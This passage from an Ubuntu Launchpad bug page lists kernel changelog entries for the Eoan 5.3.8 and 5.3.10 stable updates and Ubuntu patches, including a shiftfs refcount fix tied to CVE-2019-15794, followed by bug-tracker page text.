    - net: stmmac: xgmac: Not all Unicast addresses may be available
    - net: stmmac: dwmac4: Always update the MAC Hash Filter
    - net: stmmac: Correctly take timestamp for PTPv2
    - net: stmmac: Do not stop PHY if WoL is enabled
    - net: ag71xx: fix mdio subnode support
    - RISC-V: Clear load reservations while restoring hart contexts
    - riscv: Fix memblock reservation for device tree blob
    - drm/amdgpu: fix multiple memory leaks in acp_hw_init
    - drm/amd/display: memory leak
    - mips: Loongson: Fix the link time qualifier of 'serial_exit()'
    - net: hisilicon: Fix usage of uninitialized variable in function
      mdio_sc_cfg_reg_write()
    - net: stmmac: Avoid deadlock on suspend/resume
    - selftests: kvm: Fix libkvm build error
    - lib: textsearch: fix escapes in example code
    - s390/mm: fix -Wunused-but-set-variable warnings
    - net: phy: allow for reset line to be tied to a sleepy GPIO controller
    - net: phy: fix write to mii-ctrl1000 register
    - namespace: fix namespace.pl script to support relative paths
    - Convert filldir[64]() from __put_user() to unsafe_put_user()
    - elf: don't use MAP_FIXED_NOREPLACE for elf executable mappings
    - Make filldir[64]() verify the directory entry filename is valid
    - uaccess: implement a proper unsafe_copy_to_user() and switch filldir over to
      it
    - filldir[64]: remove WARN_ON_ONCE() for bad directory entries
    - net_sched: fix backward compatibility for TCA_KIND
    - net_sched: fix backward compatibility for TCA_ACT_KIND
    - libata/ahci: Fix PCS quirk application
    - Revert "drm/radeon: Fix EEH during kexec"
    - ocfs2: fix panic due to ocfs2_wq is null
    - nvme-pci: Set the prp2 correctly when using more than 4k page
    - ipv4: fix race condition between route lookup and invalidation
    - ipv4: Return -ENETUNREACH if we can't create route but saddr is valid
    - net: avoid potential infinite loop in tc_ctl_action()
    - net: bcmgenet: Fix RGMII_MODE_EN value for GENET v1/2/3
    - net: bcmgenet: Set phydev->dev_flags only for internal PHYs
    - net: i82596: fix dma_alloc_attr for sni_82596
    - net/ibmvnic: Fix EOI when running in XIVE mode.
    - net: ipv6: fix listify ip6_rcv_finish in case of forwarding
    - net: stmmac: disable/enable ptp_ref_clk in suspend/resume flow
    - rxrpc: Fix possible NULL pointer access in ICMP handling
    - sched: etf: Fix ordering of packets with same txtime
    - sctp: change sctp_prot .no_autobind with true
    - net: aquantia: temperature retrieval fix
    - net: aquantia: when cleaning hw cache it should be toggled
    - net: aquantia: do not pass lro session with invalid tcp checksum
    - net: aquantia: correctly handle macvlan and multicast coexistence
    - net: phy: micrel: Discern KSZ8051 and KSZ8795 PHYs
    - net: phy: micrel: Update KSZ87xx PHY name
    - net: avoid errors when trying to pop MLPS header on non-MPLS packets
    - net/sched: fix corrupted L2 header with MPLS 'push' and 'pop' actions
    - netdevsim: Fix error handling in nsim_fib_init and nsim_fib_exit
    - net: ethernet: broadcom: have drivers select DIMLIB as needed
    - net: phy: Fix "link partner" information disappear issue
    - rxrpc: use rcu protection while reading sk->sk_user_data
    - io_uring: fix bad inflight accounting for SETUP_IOPOLL|SETUP_SQTHREAD
    - io_uring: Fix corrupted user_data
    - USB: legousbtower: fix memleak on disconnect
    - ALSA: hda/realtek - Add support for ALC711
    - ALSA: hda/realtek - Enable headset mic on Asus MJ401TA
    - ALSA: usb-audio: Disable quirks for BOSS Katana amplifiers
    - ALSA: hda - Force runtime PM on Nvidia HDMI codecs
    - usb: udc: lpc32xx: fix bad bit shift operation
    - USB: serial: ti_usb_3410_5052: fix port-close races
    - USB: ldusb: fix memleak on disconnect
    - USB: usblp: fix use-after-free on disconnect
    - USB: ldusb: fix read info leaks
    - binder: Don't modify VMA bounds in ->mmap handler
    - MIPS: tlbex: Fix build_restore_pagemask KScratch restore
    - staging: wlan-ng: fix exit return when sme->key_idx >= NUM_WEPKEYS
    - scsi: zfcp: fix reaction on bit error threshold notification
    - scsi: sd: Ignore a failure to sync cache due to lack of authorization
    - scsi: core: save/restore command resid for error handling
    - scsi: core: try to get module before removing device
    - scsi: ch: Make it possible to open a ch device multiple times again
    - Revert "Input: elantech - enable SMBus on new (2018+) systems"
    - Input: da9063 - fix capability and drop KEY_SLEEP
    - Input: synaptics-rmi4 - avoid processing unknown IRQs
    - Input: st1232 - fix reporting multitouch coordinates
    - ASoC: rsnd: Reinitialize bit clock inversion flag for every format setting
    - ACPI: CPPC: Set pcc_data[pcc_ss_id] to NULL in acpi_cppc_processor_exit()
    - ACPI: NFIT: Fix unlock on error in scrub_show()
    - iwlwifi: pcie: change qu with jf devices to use qu configuration
    - cfg80211: wext: avoid copying malformed SSIDs
    - mac80211: Reject malformed SSID elements
    - drm/ttm: Restore ttm prefaulting
    - drm/panfrost: Handle resetting on timeout better
    - drm/amdgpu: Bail earlier when amdgpu.cik_/si_support is not set to 1
    - drm/amdgpu/sdma5: fix mask value of POLL_REGMEM packet for pipe sync
    - drm/i915/userptr: Never allow userptr into the mappable GGTT
    - drm/i915: Favor last VBT child device with conflicting AUX ch/DDC pin
    - drm/amdgpu/vce: fix allocation size in enc ring test
    - drm/amdgpu/vcn: fix allocation size in enc ring test
    - drm/amdgpu/uvd6: fix allocation size in enc ring test (v2)
    - drm/amdgpu/uvd7: fix allocation size in enc ring test (v2)
    - drm/amdgpu: user pages array memory leak fix
    - drivers/base/memory.c: don't access uninitialized memmaps in
      soft_offline_page_store()
    - fs/proc/page.c: don't access uninitialized memmaps in fs/proc/page.c
    - io_uring: Fix broken links with offloading
    - io_uring: Fix race for sqes with userspace
    - io_uring: used cached copies of sq->dropped and cq->overflow
    - mmc: mxs: fix flags passed to dmaengine_prep_slave_sg
    - mmc: cqhci: Commit descriptors before setting the doorbell
    - mmc: sdhci-omap: Fix Tuning procedure for temperatures < -20C
    - mm/memory-failure.c: don't access uninitialized memmaps in memory_failure()
    - mm/slub: fix a deadlock in show_slab_objects()
    - mm/page_owner: don't access uninitialized memmaps when reading
      /proc/pagetypeinfo
    - mm/memunmap: don't access uninitialized memmap in memunmap_pages()
    - mm: memcg/slab: fix panic in __free_slab() caused by premature memcg pointer
      release
    - mm, compaction: fix wrong pfn handling in __reset_isolation_pfn()
    - mm: memcg: get number of pages on the LRU list in memcgroup base on
      lru_zone_size
    - mm: memblock: do not enforce current limit for memblock_phys* family
    - hugetlbfs: don't access uninitialized memmaps in pfn_range_valid_gigantic()
    - mm/memory-failure: poison read receives SIGKILL instead of SIGBUS if mmaped
      more than once
    - zram: fix race between backing_dev_show and backing_dev_store
    - xtensa: drop EXPORT_SYMBOL for outs*/ins*
    - xtensa: fix change_bit in exclusive access option
    - s390/zcrypt: fix memleak at release
    - s390/kaslr: add support for R_390_GLOB_DAT relocation type
    - lib/vdso: Make clock_getres() POSIX compliant again
    - parisc: Fix vmap memory leak in ioremap()/iounmap()
    - EDAC/ghes: Fix Use after free in ghes_edac remove path
    - arm64: KVM: Trap VM ops when ARM64_WORKAROUND_CAVIUM_TX2_219_TVM is set
    - arm64: Avoid Cavium TX2 erratum 219 when switching TTBR
    - arm64: Enable workaround for Cavium TX2 erratum 219 when running SMT
    - arm64: Allow CAVIUM_TX2_ERRATUM_219 to be selected
    - CIFS: avoid using MID 0xFFFF
    - cifs: Fix missed free operations
    - CIFS: Fix use after free of file info structures
    - perf/aux: Fix AUX output stopping
    - tracing: Fix race in perf_trace_buf initialization
    - fs/dax: Fix pmd vs pte conflict detection
    - dm cache: fix bugs when a GFP_NOWAIT allocation fails
    - irqchip/sifive-plic: Switch to fasteoi flow
    - x86/boot/64: Make level2_kernel_pgt pages invalid outside kernel area
    - x86/apic/x2apic: Fix a NULL pointer deref when handling a dying cpu
    - x86/hyperv: Make vapic support x2apic mode
    - pinctrl: cherryview: restore Strago DMI workaround for all versions
    - pinctrl: armada-37xx: fix control of pins 32 and up
    - pinctrl: armada-37xx: swap polarity on LED group
    - btrfs: block-group: Fix a memory leak due to missing btrfs_put_block_group()
    - Btrfs: add missing extents release on file extent cluster relocation error
    - btrfs: don't needlessly create extent-refs kernel thread
    - Btrfs: fix qgroup double free after failure to reserve metadata for delalloc
    - Btrfs: check for the full sync flag while holding the inode lock during
      fsync
    - btrfs: tracepoints: Fix wrong parameter order for qgroup events
    - btrfs: tracepoints: Fix bad entry members of qgroup events
    - KVM: PPC: Book3S HV: XIVE: Ensure VP isn't already in use
    - memstick: jmb38x_ms: Fix an error handling path in 'jmb38x_ms_probe()'
    - cpufreq: Avoid cpufreq_suspend() deadlock on system shutdown
    - ceph: just skip unrecognized info in ceph_reply_info_extra
    - xen/netback: fix error path of xenvif_connect_data()
    - PCI: PM: Fix pci_power_up()
    - opp: of: drop incorrect lockdep_assert_held()
    - of: reserved_mem: add missing of_node_put() for proper ref-counting
    - blk-rq-qos: fix first node deletion of rq_qos_del()
    - RDMA/cxgb4: Do not dma memory off of the stack
    - Linux 5.3.8
    - [Config] CONFIG_CAVIUM_TX2_ERRATUM_219=y

* Eoan update: 5.3.10 upstream stable release (LP: #1852111)
    - regulator: of: fix suspend-min/max-voltage parsing
    - ASoC: samsung: arndale: Add missing OF node dereferencing
    - ASoC: wm8994: Do not register inapplicable controls for WM1811
    - regulator: da9062: fix suspend_enable/disable preparation
    - ASoC: topology: Fix a signedness bug in soc_tplg_dapm_widget_create()
    - arm64: dts: allwinner: a64: pine64-plus: Add PHY regulator delay
    - arm64: dts: allwinner: a64: Drop PMU node
    - arm64: dts: allwinner: a64: sopine-baseboard: Add PHY regulator delay
    - arm64: dts: Fix gpio to pinmux mapping
    - regulator: ti-abb: Fix timeout in ti_abb_wait_txdone/ti_abb_clear_all_txdone
    - pinctrl: intel: Allocate IRQ chip dynamic
    - ASoC: SOF: loader: fix kernel oops on firmware boot failure
    - ASoC: SOF: topology: fix parse fail issue for byte/bool tuple types
    - ASoC: SOF: Intel: hda: fix warnings during FW load
    - ASoC: SOF: Intel: initialise and verify FW crash dump data.
    - ASoC: SOF: Intel: hda: Disable DMI L1 entry during capture
    - ASoC: rt5682: add NULL handler to set_jack function
    - ASoC: intel: sof_rt5682: add remove function to disable jack
    - ASoC: intel: bytcr_rt5651: add null check to support_button_press
    - regulator: pfuze100-regulator: Variable "val" in pfuze100_regulator_probe()
      could be uninitialized
    - ASoC: wm_adsp: Don't generate kcontrols without READ flags
    - ASoc: rockchip: i2s: Fix RPM imbalance
    - arm64: dts: rockchip: fix Rockpro64 RK808 interrupt line
    - ARM: dts: logicpd-torpedo-som: Remove twl_keypad
    - arm64: dts: rockchip: fix RockPro64 vdd-log regulator settings
    - arm64: dts: rockchip: fix RockPro64 sdhci settings
    - pinctrl: ns2: Fix off by one bugs in ns2_pinmux_enable()
    - pinctrl: stmfx: fix null pointer on remove
    - arm64: dts: zii-ultra: fix ARM regulator states
    - ARM: dts: am3874-iceboard: Fix 'i2c-mux-idle-disconnect' usage
    - ASoC: msm8916-wcd-digital: add missing MIX2 path for RX1/2
    - ASoC: simple_card_utils.h: Fix potential multiple redefinition error
    - ARM: dts: Use level interrupt for omap4 & 5 wlcore
    - ARM: mm: fix alignment handler faults under memory pressure
    - scsi: qla2xxx: fix a potential NULL pointer dereference
    - scsi: scsi_dh_alua: handle RTPG sense code correctly during state
      transitions
    - scsi: sni_53c710: fix compilation error
    - scsi: fix kconfig dependency warning related to 53C700_LE_ON_BE
    - ARM: 8908/1: add __always_inline to functions called from __get_user_check()
    - ARM: 8914/1: NOMMU: Fix exc_ret for XIP
    - arm64: dts: rockchip: fix RockPro64 sdmmc settings
    - arm64: dts: rockchip: Fix usb-c on Hugsun X99 TV Box
    - arm64: dts: lx2160a: Correct CPU core idle state name
    - ARM: dts: imx6q-logicpd: Re-Enable SNVS power key
    - ARM: dts: vf610-zii-scu4-aib: Specify 'i2c-mux-idle-disconnect'
    - ARM: dts: imx7s: Correct GPT's ipg clock source
    - arm64: dts: imx8mq: Use correct clock for usdhc's ipg clk
    - arm64: dts: imx8mm: Use correct clock for usdhc's ipg clk
    - perf tools: Fix resource leak of closedir() on the error paths
    - perf c2c: Fix memory leak in build_cl_output()
    - 8250-men-mcb: fix error checking when get_num_ports returns -ENODEV
    - perf kmem: Fix memory leak in compact_gfp_flags()
    - ARM: davinci: dm365: Fix McBSP dma_slave_map entry
    - drm/amdgpu: fix potential VM faults
    - drm/amdgpu: fix error handling in amdgpu_bo_list_create
    - scsi: target: core: Do not overwrite CDB byte 1
    - scsi: hpsa: add missing hunks in reset-patch
    - ASoC: Intel: sof-rt5682: add a check for devm_clk_get
    - ASoC: SOF: control: return true when kcontrol values change
    - tracing: Fix "gfp_t" format for synthetic events
    - ARM: dts: bcm2837-rpi-cm3: Avoid leds-gpio probing issue
    - i2c: aspeed: fix master pending state handling
    - drm/komeda: Don't flush inactive pipes
    - ARM: 8926/1: v7m: remove register save to stack before svc
    - selftests: kvm: vmx_set_nested_state_test: don't check for VMX support twice
    - selftests: kvm: fix sync_regs_test with newer gccs
    - ALSA: hda: Add Tigerlake/Jasperlake PCI ID
    - of: unittest: fix memory leak in unittest_data_add
    - MIPS: bmips: mark exception vectors as char arrays
    - irqchip/gic-v3-its: Use the exact ITSList for VMOVP
    - i2c: mt65xx: fix NULL ptr dereference
    - i2c: stm32f7: fix first byte to send in slave mode
    - i2c: stm32f7: fix a race in slave mode with arbitration loss irq
    - i2c: stm32f7: remove warning when compiling with W=1
    - cifs: Fix cifsInodeInfo lock_sem deadlock when reconnect occurs
    - irqchip/sifive-plic: Skip contexts except supervisor in plic_init()
    - nbd: protect cmd->status with cmd->lock
    - nbd: handle racing with error'ed out commands
    - cxgb4: fix panic when attaching to ULD fail
    - cxgb4: request the TX CIDX updates to status page
    - dccp: do not leak jiffies on the wire
    - erspan: fix the tun_info options_len check for erspan
    - inet: stop leaking jiffies on the wire
    - net: annotate accesses to sk->sk_incoming_cpu
    - net: annotate lockless accesses to sk->sk_napi_id
    - net: dsa: bcm_sf2: Fix IMP setup for port different than 8
    - net: ethernet: ftgmac100: Fix DMA coherency issue with SW checksum
    - net: fix sk_page_frag() recursion from memory reclaim
    - net: hisilicon: Fix ping latency when deal with high throughput
    - net/mlx4_core: Dynamically set guaranteed amount of counters per VF
    - netns: fix GFP flags in rtnl_net_notifyid()
    - net: rtnetlink: fix a typo fbd -> fdb
    - net: usb: lan78xx: Disable interrupts before calling generic_handle_irq()
    - SAUCE: Revert "UBUNTU: SAUCE: (no-up) net: Zeroing the structure
      ethtool_wolinfo in ethtool_get_wol()"
    - net: Zeroing the structure ethtool_wolinfo in ethtool_get_wol()
    - selftests: net: reuseport_dualstack: fix uninitalized parameter
    - udp: fix data-race in udp_set_dev_scratch()
    - vxlan: check tun_info options_len properly
    - net: add skb_queue_empty_lockless()
    - udp: use skb_queue_empty_lockless()
    - net: use skb_queue_empty_lockless() in poll() handlers
    - net: use skb_queue_empty_lockless() in busy poll contexts
    - net: add READ_ONCE() annotation in __skb_wait_for_more_packets()
    - ipv4: fix route update on metric change.
    - selftests: fib_tests: add more tests for metric update
    - net/smc: fix closing of fallback SMC sockets
    - net/smc: keep vlan_id for SMC-R in smc_listen_work()
    - keys: Fix memory leak in copy_net_ns
    - net: phylink: Fix phylink_dbg() macro
    - rxrpc: Fix handling of last subpacket of jumbo packet
    - net/mlx5e: Determine source port properly for vlan push action
    - net/mlx5e: Remove incorrect match criteria assignment line
    - net/mlx5e: Initialize on stack link modes bitmap
    - net/mlx5: Fix flow counter list auto bits struct
    - net/smc: fix refcounting for non-blocking connect()
    - net/mlx5: Fix rtable reference leak
    - mlxsw: core: Unpublish devlink parameters during reload
    - r8169: fix wrong PHY ID issue with RTL8168dp
    - net/mlx5e: Fix ethtool self test: link speed
    - net/mlx5e: Fix handling of compressed CQEs in case of low NAPI budget
    - ipv4: fix IPSKB_FRAG_PMTU handling with fragmentation
    - net: bcmgenet: don't set phydev->link from MAC
    - net: dsa: b53: Do not clear existing mirrored port mask
    - net: dsa: fix switch tree list
    - net: ensure correct skb->tstamp in various fragmenters
    - net: hns3: fix mis-counting IRQ vector numbers issue
    - net: netem: fix error path for corrupted GSO frames
    - net: reorder 'struct net' fields to avoid false sharing
    - net: usb: lan78xx: Connect PHY before registering MAC
    - r8152: add device id for Lenovo ThinkPad USB-C Dock Gen 2
    - net: netem: correct the parent's backlog when corrupted packet was dropped
    - net: phy: bcm7xxx: define soft_reset for 40nm EPHY
    - net: bcmgenet: reset 40nm EPHY on energy detect
    - net/flow_dissector: switch to siphash
    - platform/x86: pmc_atom: Add Siemens SIMATIC IPC227E to critclk_systems DMI
      table
    - CIFS: Fix retry mid list corruption on reconnects
    - selftests/powerpc: Add test case for tlbie vs mtpidr ordering issue
    - selftests/powerpc: Fix compile error on tlbie_test due to newer gcc
    - ASoC: pcm3168a: The codec does not support S32_LE
    - arm64: dts: ti: k3-am65-main: Fix gic-its node unit-address
    - usb: gadget: udc: core: Fix segfault if udc_bind_to_driver() for pending
      driver fails
    - Linux 5.3.10
    - [Config] SND_SOC_SOF_HDA_ALWAYS_ENABLE_DMI_L1=n

* Some EFI systems fail to boot in efi_init() when booted via maas
    (LP: #1851810)
    - efi: efi_get_memory_map -- increase map headroom

* dkms artifacts may expire from the pool (LP: #1850958)
    - [Packaging] dkms -- try launchpad librarian for pool downloads
    - [Packaging] dkms -- dkms-build quieten wget verbiage

* update ENA driver to version 2.1.0 (LP: #1850175)
    - net: ena: don't wake up tx queue when down
    - net: ena: clean up indentation issue

* drm/i915: Add support for another CMP-H PCH (LP: #1848491)
    - drm/i915/cml: Add second PCH ID for CMP

* Add Intel Comet Lake ethernet support (LP: #1848555)
    - SAUCE: e1000e: Add support for Comet Lake

* seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test (LP: #1849281)
    - SAUCE: seccomp: rework define for SECCOMP_USER_NOTIF_FLAG_CONTINUE
    - SAUCE: seccomp: avoid overflow in implicit constant conversion
    - SAUCE: seccomp: fix SECCOMP_USER_NOTIF_FLAG_CONTINUE test

* tsc marked unstable after entered PC10 on Intel CoffeeLake (LP: #1840239)
    - SAUCE: x86/intel: Disable HPET on Intel Coffe Lake platforms
    - SAUCE: x86/intel: Disable HPET on Intel Ice Lake platforms

* cloudimg: no iavf/i40evf module so no network available with SR-IOV enabled
    cloud (LP: #1848481)
    - [Packaging] include iavf/i40evf in generic

* High power consumption using 5.0.0-25-generic (LP: #1840835)
    - PCI: Add a helper to check Power Resource Requirements _PR3 existence
    - ALSA: hda: Allow HDA to be runtime suspended when dGPU is not bound to a
      driver
    - PCI: Fix missing inline for pci_pr3_present()

* CML CPUIDs (LP: #1843794)
    - x86/cpu: Add Comet Lake to the Intel CPU models header

* shiftfs: prevent exceeding project quotas (LP: #1849483)
    - SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective capabilities

* shiftfs: fix fallocate() (LP: #1849482)
    - SAUCE: shiftfs: setup correct s_maxbytes limit

* Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message
    (LP: #1850443)
    - Bluetooth: hidp: Fix assumptions on the return value of hidp_send_message

* [SRU][B/OEM-B/OEM-OSP1/D/E] UBUNTU: SAUCE: add rtl623 codec support and fix
    mic issues (LP: #1850599)
    - SAUCE: ALSA: hda/realtek - Add support for ALC623
    - SAUCE: ALSA: hda/realtek - Fix 2 front mics of codec 0x623

* Suppress "hid_field_extract() called with n (192) > 32!" message floods
    (LP: #1850600)
    - HID: core: reformat and reduce hid_printk macros
    - HID: core: Add printk_once variants to hid_warn() etc
    - HID: core: fix dmesg flooding if report field larger than 32bit

* ubuntu-aufs-modified mmap_region() breaks refcounting in overlayfs/shiftfs
    error path (LP: #1850994) // CVE-2019-15794
    - SAUCE: shiftfs: Restore vm_file value when lower fs mmap fails
    - SAUCE: ovl: Restore vm_file value when lower fs mmap fails

* s_iflags overlap prevents unprivileged overlayfs mounts (LP: #1851677)
    - SAUCE: fs: Move SB_I_NOSUID to the top of s_iflags

* root can lift kernel lockdown (LP: #1851380)
    - SAUCE: (efi-lockdown) Really don't allow lifting lockdown from userspace

* Colour banding in Lenovo G50-80 laptop display (i915) (LP: #1819968) // Eoan
    update: v5.3.8 upstream stable release (LP: #1850456)
    - drm/edid: Add 6 bpc quirk for SDC panel in Lenovo G50

-- Connor Kuehl <connor.kuehl@canonical.com>  Wed, 13 Nov 2019 14:41:52 -0800

Changed in linux (Ubuntu Focal):
status:	In Progress → Fix Released

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Patches

Add patch

Bug attachments

Add attachment

Remote bug watches

Bug watches keep track of this bug in other bug trackers.

Ubuntulinux package

refcount underflow and type confusion in shiftfs

Bug Description

CVE References

Other bug subscribers

Patches

Bug attachments

Remote bug watches

Ubuntu
linux package